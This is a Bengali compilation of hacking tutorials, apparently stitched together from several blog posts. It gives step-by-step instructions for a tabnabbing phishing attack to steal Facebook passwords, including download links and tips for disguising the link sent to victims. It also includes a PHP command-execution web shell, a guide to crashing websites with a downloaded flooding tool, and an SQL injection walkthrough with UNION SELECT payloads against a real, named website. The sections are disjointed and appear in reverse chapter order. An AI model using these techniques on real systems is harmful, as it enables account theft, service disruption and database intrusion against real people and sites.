আজ আমরা শিখব ট্যাবনেবিং ব্যবহার করে কিভাবে ফেসবুকের পাসওয়ার্ড হ্যাক করতে হয়। ট্যাবনেবিং হচ্ছে একটি উন্নতমানের ফিশিং পদ্ধতি, যা ওয়েবসাইটের পাসওয়ার্ড হ্যাক করতে ব্যবহার করা হয়। সাধারন ফিশিং এ্যাটাক ফেসবুকের মাধ্যমে ধরে ফেলা যায় কারন বর্তমানে ফেসবুক কিছু অতিরিক্ত কোড ব্যবহার করে যা পূববর্তী এ্যাড্রেসটি ভ্যারিফাই করে। যদি দেখা যায় যে, পূববর্তী এ্যাড্রেসটি কোন ফিশিং বা ফেক পেজ, তাহলে তা ব্যবহারকারীকে একটি সতর্কবার্তা প্রদর্শন করে যে, “তুমি একটি ফেক বা ফিশিং পেজ থেকে এসেছ, তাই তুমি তোমার ফেসবুক পাসওয়ার্ডটি দ্রুত পরিবর্তন কর”। ফলে ব্যবহারকারী সহজেই বুঝতে পারে যে, সে কারো দ্বারা হ্যাকিং এর শিকার হয়েছে এবং সে তার পাসওয়ার্ড দ্রুত পরিবর্তন করে ফেলে। যার ফলে হ্যাকিং প্রচেষ্টাটি বিফলে যায়।

পুরনো ফিশিং পদ্ধতিটি নতুনদের জন্য যারা মূলত স্ক্রিপ্ট কিডি বা নিওবাই। যেহেতু প্রযুক্তি ও কোড প্রতিনিয়ত পরিবর্তন ও শক্তিশালী হচ্ছে সেদিকে খেয়াল রেখে হ্যাকারদেরও হ্যাকিং পদ্ধতি আরো উন্নত করতে হবে।

ট্যাবনেবিং ও পুরনো ফিশিং পদ্ধতি মোটামুটি এক রকমই। তবে তাদের মধ্যে মূল পার্থক্য হচ্ছে, ফিশিং আপনাকে একটি নির্দিষ্ট ওয়ের এড্রেসে ফিরিয়ে নিয়ে যায় যেখানে ট্যাবনেবিং ব্রাউজারে একটি মেটা রিফ্রেশ ফিচার ব্যবহার করে যা ওয়েব ব্রাউজারকে একটি নির্দিষ্ট সময় পর পেজটি রিফ্রেশ করতে বাধ্য করে, তবে রিফ্রেশের সময়টি হ্যাকার নির্ধারন করে দেন। মেটা রিফ্রেশ হচ্ছে একটি মেটা ট্যাগ যেটা ওয়েব পেজের হিডার অংশে (যারা এইচ.টি.এম.এল জানেন তারা ভালো বুঝতে পারবেন) ব্যবহৃত হয়। এটা সোর্স পেজ থেকে নির্দিষ্ট সময় পর নির্ধারিত ওয়েব সাইটে ট্রাফিক পাঠায়। যেহেতু এটা একটা মেটা ট্যাগ সেহেতু এটা শুধু প্রক্তিয়াটি সম্পন্ন করে এবং ব্রাউজার কুকিতে কোন ডাটা সংরক্ষিত হয়না। এখানেই হচ্ছে মূল বিষয়টি, যখন ফেসবুক পূববর্তী ওয়েব ঠিকানাটি চেক করে যে, ব্যবহারকারী কোথা থেকে এসেছে তখন সে কিছুই পায় না, যেহেতু হ্যাকার রিফ্রেশ সেট করে রেখেছে। নতুন একটা ট্যাবে ফেসবুক খুললে যা হয় এটা ঠিক তেমন হয়ে যায়, সোর্স এড্রেসটি মুছে যায়। আর যেহেতু কোন কুকি থাকে না সেহেতু ধরা পরার উপায় থাকে না বললেই চলে। তখন ফেসবুক বুঝতে পারে ব্যবহারকারী সাধারনভাবেই ফেসবুকে প্রবেশ করতে যাচ্ছে।

ট্যাবনেবিং করতে আমাদের যা প্রয়োজন হবে :-
.    ফিশিং পেজ
.    একটি পিএইচপি সাপোর্ট করে এমন ওয়েব সার্ভার এবং পেজগুলোকে সেখানে আপলোড করে দেয়া
.    শিকারের কাছে পাঠিয়ে দেয়া

যেভাবে ট্যাবনেবিং ব্যবহার করে ফেসবুকের পাসওয়ার্ড হ্যাক করব :-
এই পদ্ধতিতে ফেসবুকের পাসওয়ার্ড হ্যাক করতে পাঁচ মিনিটেরও কম সময়ের প্রয়োজন হয়। এই পদ্ধতিটি প্রাথমিক পযার্য়ের, পরবর্তীতে ট্যাবনেবিং এর আরো পদ্ধতি নিয়ে আলোচনা করা হবে আশা করছি।

নিচের পদ্ধতিটি অনুসরন করুন :
.    http://73679925.qqc.co/থেকে ফিশিং পেজগুলো ডাউনলোড করুন
.    আনজিপ করলে আপনি মোট চারটি ফাইল পাবেন
.    http://www.my3gb.com/ রেজিষ্ট্রেশন করুন এবং ফাইলগুলো আপলোড করুন
.    এখন ইনডেক্স (index) ফাইলটি খুলুন এবং এটার লিংকটি শিকারের কাছে পাঠিয়ে দিন।
.    পাসওয়ার্ড ফাইলটি চেক করুন, শিকারের পাসওয়ার্ড পাওয়ার জন্য।

ফেসবুক মেসেজে লিংকটি পাঠাতে চাইলে এভাবে পাঠান : http://*sizansoft.*blogspot*.com তারপর বলুন * চিন্হটি উঠিয়ে দিতে।

অনুগ্রহপূবর্ক কেউ নতুনদের প্রতারিত করবেন না, এই টিউটোরিয়াল এই জন্য যে, যাতে আপনারা নিজেদেরকে হ্যাকারদের প্রতারনা থেকে রক্ষা করতে পারেন, ই-মেইলে আসা বিশ্বাসযোগ্য নয় এমন লিংকে ক্লিক করা থেকে বিরত থেকে। আমি চাইনা কেউ এর ভুল প্রয়োগ করুক, তাই কিভাবে ফিশিং মেইল পাঠাতে হয়, এ নিয়ে আলোচনা করা থেকে বিরত থাকলাম। সবাই ভালো থাকবেন।

হ্যাকিং:আসুন জানি Vulnerability সম্পর্কে : হ্যাকিংয়ের হাতেখড়ি

আমরা অনেকেই হ্যাকিং শব্দটির সাথে পরিচিত। অনেকে হ্যাকিং বলতে কোন থ্রিলার জাতীয় কিছু বুঝে থাকেন। আজ এই হ্যাকিংয়েরই একটি পর্যায় Vulnerability সম্পর্কে আজ আমি কিঞ্চিত আলোচনা করব। বলতে লজ্জা নেই আমার নিজের এ ব্যাপারে কোন অভিজ্ঞতা ছিল না।  তবে এখন মোটামোটি জানি।তো মূল বিষয়ে ফিরে আসি।

“vulnerability” কী ?
vulnerability মানে হচ্ছে কোন সাইটের সিকিউরিটির ফাঁক-ফোকর। অর্থাৎ কোন সাইটে এ্যাটাক করার মত সুযোগ থাকাকে আমরা এক অর্থে vulnerability বলতে পারি। ওয়েবসাইটটিতে কিছু একটা ভূল আছে। মূল কথা হচ্ছে কোন সাইট এর vulnerability থাকা মানে হচ্ছে সাইটটি হ্যাক হওয়ার সুযোগ রয়েছে অথবা সাইটটির সিকিউরিটি কোন একটি দিকে দুর্বল রয়েছে। তবে কোন সাইটের vulnerability থাকার এই মানে নয় যে এটিকে হ্যাক করা যাবেই। তবে সুযোগ থাকার সম্ভাবনা রয়েছে।

“vulnerability” সাইট বের করার উপায়?
হ্যা vulnerability ত্রুটিযুক্ত সাইট বের করার উপায় রয়েছে। আর সেই উপায় হচ্ছে গুগল ডর্কের সঠিক ব্যবহার। গুগল ডর্ক মানে হচ্ছে এডভান্সড গুগল সার্চিং টেকনিক। এটা আসলে কোন হ্যাকিং নয়। তবে অনেকে এটাকে হ্যাকিংয়ের একটি পর্যায় বলে থাকেন। আমরা অনেকেই গুগল ডর্ক ইতোমধ্যে ব্যবহার করে থাকব। কিছু গুগল ডর্ক নিচে দেয়া হল।

# site:domain.com “search term = restricts search results to the given domain.
# allinurl:WORDS = shows only pages with all search terms in the url.
# inurl:WORD = like allinurl: but filters the URL based on the first term only.
# allintitle:WORD = shows only results with terms in title
# intitle:WORD = similar to allintitle, but only for the next word.
# cache:URL = will show the Google cached version of the URL.
# info:URL = will show a page containing links to related searches, backlinks, and pages
# link:URL = lists other pages that link to the URL.
# related:URL = lists other pages that are related to the URL.
# filetype:FILETYPE = will restrict searches to that filetype
# -filetype:FILETYPE = will remove that file type from the search.
# site:www.anysite.net “+www.anysite.net” = shows you how many pages of your site are indexed by google
# allintext: = searches only within text of pages, but not in the links or page title
# allinlinks: = searches only within links, not text or title


গুগল ডর্ক কী ?
কোন সাইট পাবলিশড করার পর তা স্বাভাবিক নিয়মে গুগল সার্চ ইঞ্জিনে সাবমিট করা হয়। গুগলে ওয়েবমাস্টারের মাধ্যমে কোন সাইট সাবমিট না করলেও গুগলবট সেই সাইট নিজের কাছে নিয়ে নিতে পারে। প্রতিটি সাইটের নিজের ইনডেক্স থাকে। গুগল সেই ইনডেস্ক দিয়ে নিজেদের সার্ভারে একটা টেবিল তৈরী করে। সেই সাইটের সকল ডেটা ইনডেস্ক করা থাকে গুগলের কাছে। তাই ডর্ক দিয়ে সার্চ করলে আপনার টার্গেটকৃত সাইটটির ইনডেস্ক খুব সহজেই আপনি খুঁজে পেতে পারেন।

গুগলের এই ইনডেস্কিং বন্ধ করতে পারেন আপনি যাতে কেউ আপনার সাইট কেউ হ্যাক করতে না পারে। এই ব্যাপারে বিস্তারিত টিউন পরবর্তীতে পুদিনা পাতা ভাই দেবেন। আর হ্যা ASP.net এবং Oracle সাইটে ব্যবহার করলে সাইটটির vulnerability পাওয়ার সম্ভাবনা প্রায় নেই বললেই চলে।

অধ্যায়: ২১ বেসিক ওয়েবসাইট হ্যাকিং (তথ্য)-৩

ওয়েবসাইট হ্যাকিং :
ওয়েবসাইট হ্যাকিং করা হয় সাধারনত হ্যাকারদের নিজস্ব চাহিদা পূরন করতে বা জনপ্রিয়তা অর্জন করতে। ওয়েবসাইট হ্যাকিং একটি সাধারন ব্যাপার, এটা কোন ওয়েবসাইটের মূল ব্যবস্থা ভেঙ্গে ফেলতে ব্যবহৃত হয়। এটা থেকে বাচার জন্য ওয়েবমাস্টাররা এনক্রিপশন ব্যবহার করে। যাহোক, অনেক ওয়েব প্রোগ্রামাররাই এনক্রিপশন ব্যবহার করে না যা কিনা হ্যাকাররা খুজে বের করে আক্রমন করে। হ্যাকিং কার্য থেকে বাচার উপায় হতে পারে জাভাস্ক্রিপ্ট, এএসপি, পিএইচপি এবং সিজিআই, কিন্তু অনেক সময় ভাষার ব্যবহারও হ্যাকিং কার্য থেকে সার্ভারকে রক্ষা করে।
দুই ধরনের ওয়েব হ্যাকিং :

১। কোন ওয়েবসাইটের পাসওয়ার্ড প্রোটেকশন ভেঙ্গে ফেলা
২। ওয়েবসাইট পরিবর্তন করা।

হ্যাকারদের সুযোগ :
আপনি যখন কোন ওয়েবসাইট ব্রাউজ করেন এবং সেখানে যদি আপনার ইমেইল এড্রেস দেয়ার প্রয়োজন হয় এবং সেই ইমেইল এড্রেসটি যেখানে জমা হয় সেটাই ওয়েব সার্ভার। যদি আপনি কোন হোস্টিং সার্ভার ভেঙ্গে ফেলেন তাহলে আপনি হয়ত হাজারো ওয়েবসাইটের ক্ষতি সাধন করতে পারবেন যেগুলো ওই হোস্টিং কোম্পানীর সার্ভারে হোস্ট করা। তাছাড়া যে সকল কোম্পানীগুলো অনলাইনে পন্য বেচা-কেনা করে তাহলে হ্যাকাররা সর্বাপেক্ষা বেশি লাভবান হয়। সেক্ষেত্রে তারা ভিজিটরদের ক্রেডিট কার্ড নাম্বার চুরি করে। তবে এক্ষেত্রে বেশিরভাগ হ্যাকাররাই ধরা পড়ে। তবে আইপি,ম্যাক হাইড করলে ধরা পড়ার সম্ভাবনা কম থাকে। তাছাড়া যেসব সার্ভার সাইড এক্সেস সাপোর্ট করে এবং গেষ্টবুক এবং ফর্ম সাবমিশন রাখে সেক্ষেত্রেও হ্যাকারদের ধরা পড়ার সম্ভাবনা কম থাকে।

কিভাবে এটা ঘটে?
এটা তখনই ঘটে যখন স্ক্রিপ্ট সার্ভার সাইড ভাষায় রান হয় এবং পাসওয়ার্ড এনক্রিপ্ট করা হয় না অথবা ডাটাগুলো প্রোটেক্ট করা না হয়।যদি হ্যাকার কোন কোন ধরনের সুযোগ দেখতে পায় তাহলে সে এটিকে ভেঙ্গে ফেলতে চেষ্টা করে।তারা এটা করে সাধারনত কিছু কোড রান করে অথবা স্ক্রিপ্ট দিয়ে পাসওয়ার্ড জেনে ফেলে অথবা আইনসিদ্ধ কোন ইউজারের গোপন তথ্য জেনে ফেলে।

অধ্যায়: ২০ বেসিক ওয়েবসাইট হ্যাকিং (তথ্য)-২

ওয়েব সার্ভারে আক্রমন করা :
1. SQL Injection
2. PHP Remote Code Execution
3. Web Ripping
4. Google Hacking

SQL Injection :
SQL Injection হচ্ছে একধরনের আক্রমন প্রক্রিয়া যাতে ফায়ারওয়াল দিয়ে রক্ষিত ডাটাবেসের ডাটা সমূহে টার্গেট করা হয়। এটা ওয়েব নির্ভর যেকোন এ্যাপ্লিকেশনের প্যারামিটার পরিবর্তনের চেষ্টা করে যা এসকিউএল নির্ভর কোন সার্ভারথেকে ডাটা সংরক্ষন করতে ব্যবহৃত হয়।
সাধারনত, প্রথম পদক্ষেপে এটা কোন আক্রমন উপযোগী ওয়েব এ্যাপ্লিকেশন অরক্ষিত করে। এই এ্যাটাকটি ঐ ওয়েব এ্যাপ্লিকেশনটির দুর্বল কোডিং এবং ওয়েবসাইট এডমিনের সুযোগ গ্রহন করে।
একটি SQL Injection এর মাধ্যমে কোন আক্রমন উপযোগী ওয়েব সার্ভারকে আক্রমনের মাধ্যমে এর কর্তৃত্ব নেয় যাতে করে ঐ সার্ভার ডাটাবেসের যেকোন তথ্য পড়া, পরিবর্তন করা বা মুছে দেয়া যায়।

ধারনা :
SQL Injection এ ইউজার SQL কোয়েরীতে স্থাপিত যেকোন ডাটার কন্ট্রোল নিতে পারে কোনরকম ডাটার শুদ্ধতা পরীক্ষা করা ছাড়াই। এর দ্বারাই ইন্টারনেটে প্রতিদিন হাজার হাজার ওয়েব এ্যাপ্লিকেশন ক্ষতিগ্রস্থ হচ্ছে। বর্তমানে ইন্টারনেটে প্রায় ৫০% বড় ই-কমার্স সাইট এবং ৭৫% ছোট ই-কমার্স সাইট এই আক্রমন উপযোগী। কোন ওয়েবসাইটে যদি CFML, ASP, JSP এবং PHP এর অসম ব্যবহার থাকে তাহলে ঐ সকর সাইট এই আক্রমনের উপযোগী।

SQL Injection এ ভ্যালিডেশন প্রবেশ করানো :
    SQL Injection আক্রমন প্রশমিত করার জন্য কিছু টুলস বা পরিকল্পনা রয়েছে।
    ওয়েব ডেভেলোপাররা লগইন পেজে কিছু সন্ধিগ্ধ কারেক্টার প্রবেশ করায়। যেমন: ‘, “, , , — ,
    ডাটাবেসে সবসময় পাসওয়ার্ডগুলো এনক্রিপ্ট করে রাখা
    এই পদ্ধতিগুলোর সঠিক ব্যবহারেও এসকিউএল প্রতিরোধ করা যায় না, কিন্তু এগুলো হ্যাকারের হ্যাকিং কার্য কঠিন করে দেয়।

PHP Injection :
এই আক্রমন কোন টার্গেট ওয়েব সার্ভারের সিস্টেম লেভেল ভেঙ্গে ফেলতে ব্যবহৃত হয়। এই আক্রমনের দরুন, হ্যাকার ওয়েবসার্ভারটিতে প্রবেশ করতে পারে এবং এর সমস্ত ফাইলের কর্তত্ব নিয়ে নিতে পারে।

Script :
1.<form action=" " method=post>
2.<input type=text name=command>
3.<input type=hidden name=filled value=1>
4.<input type=submit value="Run Command">
5.</form>
6.<?php
7.if($_post[filled]==1)
8.{
9.$output=exec("$_post[command]")
10.print $output;
11.}
12.?>

Counter Measure :
১। এটা আপনার সার্ভারে তথ্য সাপ্লাইয়ের পূর্বেই ইউজারের দেয়া তথ্যাদির সত্যাদি পরীক্ষা করে দেথে, এটা সাধারনত জাভাস্ক্রিপ্ট বা অন্য কোন ফিল্টারিং মাধ্যমে ব্যবহৃত হয়।

Web Ripping :
ওয়েব রেপিং কোন নির্দিষ্ট ওয়েবসাইটের ঠিকানা থেকে ছবি বা ইমেজ বা অন্যান্য মিডিয়া ফাইল খুজে বের করে তা এক্সট্রাক্ট করে এবং আপনার হার্ড ড্রাইভে তা সংরক্ষন করে রাখে। ওয়েব রেপিং কোন ওয়েবসাইটটির সম্পূর্ণ গঠন আপনার হার্ড ড্রাইভে সংরক্ষনের ক্ষমতা রাখে।

সাবধানতা :  আপনি ওয়েবসাইটটির এডমিন কর্তৃক ধরা পড়ে যেতে পারেন কারন আপনিতো সেখানে একটি সাধারন ইউজার হিসেবে প্রবেশ করেছেন যাতে করে কর্তৃপক্ষ আপনার আইপি বাতিল করে দিতে পারে বা ঐ সার্ভারটি থেকে আপনার সংযোগ প্রকৃয়া কেটে দিতে পারে।
ওয়েব রেপিংয়ে ব্যবহৃত কিছু টুলস :
1). Black Widow.
2). Wget
3). Web Sleuth.

Google Hacking :
ইন্টারনেটের প্রায় ৮০ ভাগ সার্চ কোয়েরী আসে গুগলের সার্ভার থেকে। এটা বর্তমানে সর্বাপেক্ষা শক্তিশালী এবং জনপ্রিয় সার্চ ইঞ্জিনে পরিনত হয়েছে। এটার জনপ্রিয়তা এর সার্চ ক্ষমতা থেকেই আসে নি, বরং এটার কোয়েরী বা ইনডেক্সিং করার ক্ষমতা থেকেই এসেছে। যাহোক, আমাদের মনে রাখা উচিত যে, ইন্টারনেট হচেছ একটি উচ্চ ক্ষমতা সম্পন্ন মাধ্যম, যার কারনে গুগল যে রেজাল্টগুলো দেয় তা সবসময় আপ-টু-ডেট হয়না বা কিছু তথ্য হয়ত চুরি হয়ে যায়।এছাড়াও কিছু নিষিদ্ধ উপাদান গুগলবট (এটা গুগলের স্বয়ংক্রিয় স্ক্রিপ্ট যা ইন্টারনেটের সকল তথ্যাদি গুগল সার্ভারে জমা করে রাখে) দ্বারা ভিজিটও হয়না। আমরা জানি যে, গুগল একটা সার্চ ইঞ্জিন।

গুগলের কিছু নির্দিষ্ট ষ্ট্রিং বা কমান্ড দিয়ে সার্চের মাধ্যমে গুগল কর্তৃক হ্যাকিং কার্য সম্পন্ন করা হয়। যেটাকে গুগল এ্যাডভান্সড অপারেটর বলা হয়। এর মাধ্যমেই দৈনিক লাখো লাখো ওয়েবসাইট বের করা হয় যেগুলো হ্যাকিং আক্রমন উপযোগী।

অধ্যায়: ১৯ বেসিক ওয়েবসাইট হ্যাকিং (তথ্য)-১

ওয়েব সার্ভার :
এটি এক ধরনের সেবা যেটা যেখানে কোন ওয়েবসাইটের উপাদানসমূহ থাকে সেই কম্পিউটারের মাধ্যমে রান হয়। যেটাকে আমরা শুনে থাকি পোর্ট ৮০ বা http বা https নামে। এ্যাপাচি একধরনের ওয়েব সার্ভারের উদাহরন।

ওয়েব সার্ভারের কার্যপ্রণালী :
প্রথমে আমাদের ব্রাউজার একটি সার্ভারের সাথে সংযুক্ত হয় এবং একটি পেজের জন্য অনুরোধ পাঠায়। তারপর ঐ সার্ভার ঐ পেজ সহ অনুরোধটিতে সাড়া দেয়। এখানে মূলত তিনটি প্রক্রিয়া।

১। সার্ভার এবং ব্রাউজারের মধ্যে একটি সংযোগ তৈরী হওয়া
২। ব্রাউজার থেকে সার্ভারে একটি অনুরোধ পাঠানো
৩। সার্ভার থেকে অনুরোধে সাড়া প্রদান।
সাধারন কিছু কাজ :
 ধাপ-১
ব্রাউজার কোন ওয়েবসাইটের ইউআরএল (URL) কে তিনটি ভাগে বিভক্ত করে।
১। প্রোটোকল (http)
২। সার্ভার নাম (www.example.com)
৩। ফাইল নাম (index.html/index.php)
ধাপ-২
ব্রাউজারটি একটি আইপি এড্রেসের মধ্য দিয়ে নাম সার্ভার দিয়ে সার্ভারটি অনুবাদ বা পড়ার জন্য সংযুক্ত হয় যেটা মূলত সার্ভারের মূল যন্ত্রের সাথে সংযোগ রক্ষা করে।
ধাপ-৩
ব্রাউজারটি তারপর পোর্ট ৮০ এবং আইপি এড্রেসের মধ্য দিয়ে মূল সার্ভারে যুক্ত হয়ে যায়।
ধাপ-৪
এই পোর্ট ৮০ বা http কে অনুসরন করে, ব্রাউজারটি ঐ সার্ভারে GET অনুরোধ পাঠায়, যেটি http://www.example.com/index.php নামে কোন ফাইলের খোজ করে।
নোট : কুকিসের মাধ্যমে (এটি একটি ক্ষুদ্র টেক্সট বা লেখা যেটি ইউজারের কম্পিউটারে সংরক্ষিত থাকে, এটি আসে মূলত ব্রাউজারের মাধ্যমে এবং এই টেক্সট বা লেখাটিতেই কিছু তথ্য লুকায়িত অবস্থায় থাকে।) ব্রাউজার GET অনুরোধ পাঠাতে পারে।
ধাপ-৫
সার্ভারটি তখন কাঙ্খিত ওয়েবসাইটটির জন্য html ফাইলটি প্রেরন করে। (এক্ষেত্রেও সার্ভার থেকে কুকিস প্রেরন হতে পারে।)
ধাপ-৬
ব্রাউজারটি এবার html ফাইলটি পরতে চেষ্ঠা করে এবং এটি ব্রাউজারের স্ক্রিনে প্রদর্শনের ব্যবস্থা করে।
একটি ওয়েব সার্ভার সেট করা :
একটি ওয়েবসার্ভার সেট করতে সাধারনত যেসকল টুলস গুলো কাজে লাগে সেগুলো হল-
১। এ্যাপাচি বা এই জাতিয় কোন টুলস
২। ইন্টারনেট ইনফরমেশন সার্ভিস (IIS)
ওয়েবসাইটে লগইন প্রক্রিয়া :
আপনি আপনার কম্পিউটারে বসে আছেন। ইন্টারনেটে ব্রাউজ করছেন, একটি ওয়েবসাইট ওপেন করলেন যেটাতে আপনি লগইন করবেন।
১।  আপনি আপনার লগইন ইউজারনেম এবং পাসওয়ার্ড দিবেন। সাইন ইন বা লগ ইন এ ক্লিক করবেন এবং আপনি আপনার একাউন্টে প্রবেশ করবেন।
২। ওয়েব সার্ভার ইউজারনেম এবং পাসওয়ার্ড পেল এবং এগুলো সে ডাটাবেস সার্ভারকে পাঠিয়ে দিল।
৩। ডাটাবেস সার্ভার (যেখানে সকল তথ্যাদি জমা থাকে) ওয়েব সার্ভার থেকে ইউজারনেম এবং পাসওয়ার্ড পেল এবং এই ইউজারনেম এবং পাসওয়ার্ডের জন্য এর টেবিল খুজে দেখে এবং এর ফলাফল পুনরায় ওয়েবসার্ভারে পাঠিযে দেয়।
৪। ওয়েব সার্ভার ডাটাবেস সার্ভার থেকে ফলাফল পেল এবং এই রেজাল্টের উপর নির্ভর করেই সে ইউজারকে নির্দিষ্ট স্থানে প্রেরন করল।

RDOS

সবাইকে আমার হ্যাকিং স্কুলের পক্ষ থেকে অনেক অনেক শুভেচ্ছা ।আসুন মুল আলোচনায় আসা যাক । অনেক রাত হয়েছে তাই বেশি কথা বিক্রি করলাম না । আমরা অনেকেই চাই যে হ্যাকারহতে । কিন্তু নিজেকে সামনে বসিয়ে প্রশ্ন করুন তো যে তুমি কি যান? যাই হোক মুল কথায় আসি । আজ শেখাবো কিভাবে ছোটখাটো ওয়েব সাইট হ্যাক করতে হয় ।
প্রথমেঃ 1.Port scaner . http://www.mediafire.com/?sharekey=7fcc5e5c82ff2dcbe62ea590dc5e5dbbe04e75f6e8ebb871 2.RDOS. http://www.mediafire.com/?sharekey=7fcc5e5c82ff2dcbe62ea590dc5e5dbbe04e75f6e8ebb871 ডাউনলোড করুন । এবার আপনি যে সাইট টি ক্রাসকরতে চান । সেটার আইপি আপনাকে জানতে হবে । আপনি কিজানেন কি করে আইপি বের করতেহয়? যদি না জানেন তাহলে নিচের নিয়ম ফলো করুন । Run -> cmd -> এবার কমান্ড প্রোমটে নিচের কোড টা দিন । Ping http://www.site.com এবার ওই সাইটের আইপি পাবেন । এবার দেখতে হবে PORT 80 খোলা আছে কি না । port scaner টা ওপেন করে আইপি দিয়ে দেখুন PORT 80 খোলা আছে কি না । যদি না থাকে তাহলে অন্য সাইট দেখুন । আর থাকলে নিচের নিয়ম ফলো করুন । RDOS ওপেন করুন । প্রথমে যে আইপিটা পেয়েছিলেন সেটা দিন । যদি PORT 80 খোলা না থাকে তাহলেকাজ করবে না । Click to. [{(Flooding)}] ব্যাস সাইট টি ক্রাস হয়ে গেলো । তবে সাইটটি নষ্ট হবেনা । আপনি মাঝে মাঝে এমন করলে কিছু দিন সাইটের র্সাভার কাজ করবে না । পোস্টি দ্বারা কারো ক্ষতি হলে আমি দায়ি থাকবো না ।

what is SQL and how to hack a website SQL injection কি ?

 হ্যাকিং করার অনেকগুলো পদ্ধতি আছে। আর এর মধ্যে সবচেয়ে যেটা বেশি জনপ্রিয় সেটা হল SQL. অনেকেই হয়ত জানেন না SQL এর পূর্ণরূপ। SQL এর পূর্ণরূপ হল Structured Query Language. এটা একটি হাই লেভেল ল্যাঙ্গুয়েজ। যেটা মানুষকে স্তব্দ করে দেয়। :) যেমনঃ- select, add data, delete data, update data এর জন্য যথাক্রমে SELECT,INSERT,DELETE,UPDATE কোয়ারিগুলো ব্যবহৃত হয় এখানে। সাধারণত SQL ডাটাবেজ ডিজাইনের জন্য ব্যবহৃত হয়। তথ্য সাধারণত ডাটাবেজে সেভ থাকে। আর SQL injection এর কাজ হল একটি ত্রুটিপূর্ণ এ্যাপ্লিকেশানের ডাটাবেজের ত্রুটি বের করে এখানে আক্রমণ করে ডাটাবেজ দেখা ও ডেটাবেজের সম্পূর্ণ নিয়ন্ত্রণ নিয়ে ফেলা। আর এই ধরনের ডেটাবেজের লিংক  দেখতে এমন হয়

www.anything.com/something.php?something=something

যেমনঃ-

www.tartanarmy.com/news/news.php?id=130

এখানে ১৩০ হল, আমরা ডেটাবেজের ১৩০ পার করেছি। এখন আপনি এই লিংকের একদম শেষে একটি চিহ্ন যোগ করে এটার ত্রুটি বের করবেন। চিহ্নটি হল ( ‘ ) । যেমনঃ-

www.tartanarmy.com/news/news.php?id=130'

তাহলে একটি ইরর দেখাবে।

https://www.facebook.com/unselected
এবার একটু বেসিক জিনিস দেখেনঃ—–>
প্রত্যেক ডাটাবেজ সার্ভারের উপর ডাটাবেজ আছে। তাই না ?? আবার প্রত্যেক ডেটাবেজের টেবিলও রয়েছে। আবার প্রত্যেকটি টেবিলের রয়েছে বিভিন্ন কলাম। আর এই কলামগুলোতে থাকে ডাটা সংরক্ষিত।

উপরের ছবিতে দেখুন ডাটাবেজ আছে ৬টা আমরা “explore_hacking” ডাটাবেজটা সিলেক্ট করলাম। এটার দেখুন ৪টা টেবিল আছে admin, articles, products, subscribers. প্রতিটি টেবিলের রয়েছে আরও কলাম ও ডেটা। যেমনঃ- আমি ‘admin’ টেবিলটি সিলেক্ট করলাম। এখন দেখূন, এটা রয়ে id, username, password, email কলাম। আর এই সম্পর্কে আরও বিস্তারিত জানতে আমার phpmyadmin টিউটোরিয়াল ও PHP & MySQL টিউটোরিয়ালগুলো দেখূন। তাহলে আরও ভাল করে বুঝতে পারবেন।
information_schema কি ?
এটা হল information database. আর এটি SQL database severs(version>5) এ ডিফল্ট ভাবে থাকে। এখানে সব ধরনের তথ্য সংরক্ষিত থাকে। যেমনঃ- টেবিলের নাম, কলামসহ সব তথ্য।

https://www.facebook.com/unselected
এখন আমারা “information_schema” ডেটাবেজটি ওপেন করলাম। আর এই ডেটাবেজের টেবিলটির নাম হল ”TABLES”

https://www.facebook.com/unselected
————————————————————————————————————————————————————
এতক্ষণ পর্যন্ত যত বকবক করলাম এটা কিন্তু টিউটোরিয়ালে অংশবিশেষ। এক ঢিলে দুই পাখি মারার ব্যবস্থা করলাম আপনাদের জন্য। এবার আমরা যাবো, মূল টিউটোরিয়ালে। আপনি যাবেন ???? আসেন ঘুরে আসি, কি করা যায়। একদমই বিস্তারিত ভাবে শিখুন। একদমই সহজ পদ্ধতিতে।
————————————————————————————————————————————————————
-: SQL Injection টিউটোরিয়াল :-
প্রথমে এখানে লগইন করুন।

http://www.tartanarmy.com/news/news.php?id=130

শুধু url দিলেই হবে না। এখানের ভ্যালুয়ারেবল কলাম খুঁজে বের করতে হবে। একবার একটা টিউটোরিয়ার শুরু করেছিলাম SQL এর উপর। কিন্তু সেটার ৩ পর্ব লিখে থেকে গিয়ে ছিলাম। কারণ অনেক চিন্তা ভাবনা, সময়সহ আরও অনেক ঝামেলার কারণে সেটা আর করতে পারি নি। কিন্তু চিন্তা আছে সমানে দুটা একসাথে শুরু করবো। BackTrack ও SQL . সাথেই থাকবেন।
কলাম কিভাবে বের করবেনঃ-
এখানে আমারা “ORDER BY” clause ব্যবহার করবো। এটা ব্যবহার করা হয় যাতে sort the columns এর জন্য। এখন যে  কোন একটি নাম্বার সিলেক্ট করুন। যেমনঃ- 10. “–” এটি ব্যবহার করা হয়, কমেন্টের পরে কিছু করার জন্য।
এবার url টিতে যান

http://www.tartanarmy.com/news/news.php?id=130 order by 10--

উপরের লিংকটি কপি করে ব্রাউজারে পেষ্ট করুন। অথবা এখানে ক্লিক করুন Click here
মূলত এখানে আমরা ১০টি কলাম নির্দিষ্ট করলাম। যখনই আপনি এটা দিলেন, এটি সাথে সাথে একটি ইরর ম্যাসেজ দিলো, তার মানে এখানে কলাম ১০ টি থেকে কম আছে। এবার 10 এর পরিবর্তে 9 দিন।

http://www.tartanarmy.com/news/news.php?id=130 order by 9--

এখন এটি আবারও ইরর দিলো ! তার মানে এখানও এটা বুঝায় যে, কলাম ৯টির চেয়ে কম আছে। এবার আমরা একটু পন্ডিতি করে 9 এর জায়গায় 6 দিলাম।

http://www.tartanarmy.com/news/news.php?id=130 order by 6--

বাহ এটি ইরর দেয় নি। তার মানে আমরা পেয়ে গেছি। এটি যেহেতু কোন ইরর দেয় নি, তার মানে এটির ৬টি কলাম আছে।
vulnerable columns খুঁজে বের করাঃ-
একটু আগে আমরা যা করলাম তাহল, ডেটাবেজটিতে কয়টি কলাম আছে, তা বের করলাম। এখন আমরা বের করলাম কোন কলামটি vulnerable . এবার আমরা “UNION ALL” ও “SELECT” command ব্যবহার করে দেখবো।  130 এর সামনে একটি ড্যাস চিহ্ন (-) দিন।

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--.

অথবা এখানে ক্লিক করুন Click here
এখানে আমাদের একটি জোড় সংখ্যা পেত হবে। এখন এখানে দেখুন, যে সংখ্যাটি বোল্ড করা সেটি হল vulnerable columns. এখানে 2 নংটি হল vulnerable

https://www.facebook.com/unselected
database version খুঁজে বের করাঃ-
এবার “@@version” বা “verson()”  দিয়ে most vulnerable column টি রিপ্লেস করুন। তবে এখানে প্রথম কমান্ডটি কাজ না করলে পরেরটা হবে।

